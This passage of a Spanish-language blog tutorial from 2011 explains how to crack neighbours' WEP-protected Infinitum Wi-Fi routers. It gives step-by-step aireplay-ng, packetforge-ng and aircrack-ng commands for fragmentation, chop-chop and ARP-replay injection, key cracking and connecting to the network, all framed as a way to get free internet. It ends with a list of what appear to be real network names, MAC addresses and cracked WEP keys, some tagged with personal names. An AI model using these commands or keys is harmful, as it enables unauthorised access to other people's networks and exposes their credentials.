y te brinca directamente a paso cuatro.
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b MAC_DEL_AP -h 00:25:d3:e3:f5:42 mon0
o si el punto de acceso te muestra 54e o algo similar que indica que el punto de acesso
trabaja en modo de migración utiliza el siguiente comando que es similar al Client-mode
Arp replay o reproducción de ARP en modo cliente. Esperas y cuando te pregunta si quieres
aceptar el paquete le das en S(i). Aveces tarda y con el ataque de modo migración aveces
nunca saled pero es porque estas muy lejos pero aveces cuando estas a punto de darte por
vencido, empieza a inyectar paquete y se ven los datos subir en el airodump.
En ese flujo de datos que contiene todos esos IV es lo que permite al aircrack-ng a sacar
la clave atravez de una prueba estadistical que determina cada byte de la clave con 100%
de exactitud y con menos de 25000 IVS en la mayoria de los casos.
B) < Modo Migración 54e > Usalo en vez del ataque de fragmentación o chop chop para redes 54e
aireplay-ng -8 -b MAC_DEL_AP -h MAC_DE_TU_TARJETA mon0
C) < Ataque de Modo Cliente de Reproducción Arp (o Client Mode Arp Replay Attack) >
(Usa lo si hay clientes conectados y dale en si cuando te llega un ARP)
aireplay-ng -3 -b MAC_DEL_AP -h 00:25:d3:e3:f5:42 mon0
D) < Ataque de Fragmentación >
Tiene la ventaja ser el más rápido para sacar el PRGA para luego utilizar en la generación de un paquete ARP a inyectar luego con el aireplay-ng. Nota: borra los archivos fragment anteriores con rm fragment-*
aireplay-ng -5 -b MAC_DEL_AP -h 00:25:d3:e3:f5:42 mon0
Luego generas un paquete arp con el sigiente comando:
packetforge-ng -0 -a MAC_DEL_AP -h 00:25:d3:e3:f5:42 -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w arp-request
Es exitóso cuando termina el proceso diciendo que se escribo el archivo fragment-*.xor
Pero aveces no funciona porque tienes que estar más cerca para que funcione el ataque fragmentación.
E) < Ataque Chop-chop >
El comando chop chop tarda más pero siempre logra el resultado para mi al menos y
es más emocionante ver el contador contar hasta 100 indicando que el siguiente
es como pan comido y puedes empezar a celebrar porque en poco tiempo serás el nuevo
dueño de un enrutador infinutum con acceso total en 99% de los casos. Lo primero
que hago yo al tener acceso es, ah espera todavía no terminamos!!!
Nota: borra los archivos replay_dec anteriores con rm replay_*. (Truco: Después de rm teclee las primeras 2 o 3 letras de replay_dec, luego Tab para completar y un asterisko y enter para borrar todos los archivos
replay_dec.
Si no borras los replay_dec la próxima vez que ejecutas el ataque van a ser 2 archivos replay_dec y el
siguiente comando packetforge-ng no va poder determinar cual es e archivo que debe abrir y debido al asterisk va a abrir el primer archivo replay_dec en orden alfabético.
aireplay-ng -4 -h 00:25:d3:e3:f5:42 -b MAC_DEL_AP mon0
Luego generas un paquete arp con el sigiente comando:
packetforge-ng -0 -a MAC_DEL_AP -h 00:25:d3:e3:f5:42 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec*.xor -w arp-request
CUARTO PASO - INYECCIÓN DE ARP
En este paso vas a inyectar el paquete que generaste el paso 3 en los ataque de D o E o sea el
ataque de fragmentación o el chop-chop, respectivamente.
aireplay-ng -2 -r arp-request mon0
Verás en el airodump-ng que rapidamente suben los data. Eso es precicamente lo que queremos.
Esperamos a que llega esta cifra a 200000 mas o menos y pasamos último paso con aircrack-ng
Nota: a mi me gusta usar un segundo interfaz virtual que puedes crear en paso dos con
airmon-ng start wlan0 CANAL
QUINTO PASO: CRAKEAR LA CLAVE
En otra ventana de terminal pon
aircrack-ng -b MAC_DEL_AP -z capture*.cap
Si estas crakiendo una red 54e usa el siguiente comando:
aircrack-ng -a 1 -b MAC_DEL_AP -z capture*.cap
Eso fuerza al programa en un modo de solo considerar los paquetes WEP
En el caso de WPA-PSK utilizas 2 en vez de 1 después del parametro -a
El uso de ese parametro en para otro tutorial!
KEY FOUND!!!!!!!!!
FELICIDADES YA SACASTE LA CLAVE
SEXTO PASO - La Conexión Ininicia
Ahora vete a tu gestor de red como wicd
y llena el campo de IP estático con uno que esté fuero del rango de DHCP
como 192.168.1.7 (7 por la suerte). Dale en tab (en wicd) y se llena
el subnet mask automaticamente.
Dale otro enter y llenas el campo de puerto de enlace.
Solo cambias el 1 en 192.168.1.1 a 254 para que se vea así:
192.168.1.254.
Ve a Settings > Advances Settings y la sección de Global DNS Servers,
selecciona la casilla de Use global DNS Servers.
Llena los campos de DNS Server 1 y DNS Server 2 así con los IP de OpenDNS así:
DNS Server 1: 208.67.222.222
DNS Server 2: 208.67.220.220
Dale en OK y conectate.
PROXIMAMENTE COMO USAR EL PROGRAMA KARMA
ESSID MAC CH ENC KEY
terminal
INFINITUM5681 00:1E:C7:2F:9A:61 11 WEP 7635354966 (ASCII: v55If
estafeta
INFINITUM3190 00:21:7C:CD:B4:61 11 WEP 0270783530
floreros
INFINITUMC1A958 00:24:17:BB:94
7 11 WEP 568F87CDC3INFINITUM069a 64:16:F0:30:F6:15 1 WEP 6534373130 (ASCII: e4710 )
INFINITUMECA48E 64:16:F0:30:F6:15 11 WEP A8D2012637
INFINITUM57E1D0 00:26:44:65:B0:33 6 WEP 34F65EC573
INFINITUM651782 00:26:44:0D:2F:01 11 WEP 6E0F5755B3
INFINITUM4890 00:1F:B3:8E:58:E1 4 WEP
INFINITUMA6BC5D 00:26:44:5D:1A:8D 1 WEP
INFINITUM7b22 00:25:68:23:12:4C 1 WEP 3138383631 ASCII: 18861
INFINITUM7218 00:21:7C:C1:56:A1 2 WEP 7209098958
INFINITUM5584 00:21:7C:73:28:E1 11 WEP 4231722656 ] (ASCII: B1r&V
francisca chavez 3
diego amigo de florero
INFINITUMd75e 4C:54:99:37:AC:F5 6 WEP 3863636361 ] (ASCII: 8ccca )
INTERNET GRATIS CON LINUX - OTRA FORMA DE PROTESTAR UN MONOPOLIO CON MA L SERVICIO
Autor: fasttux-rfPosteado: 29/06/11
Tags: INTERNETGRATIS,CRAKEARWEP,CRAKEARWiFiINFINITUM,SACARWEP,HACKWEP,AIRCRACK-NG
Denunciar
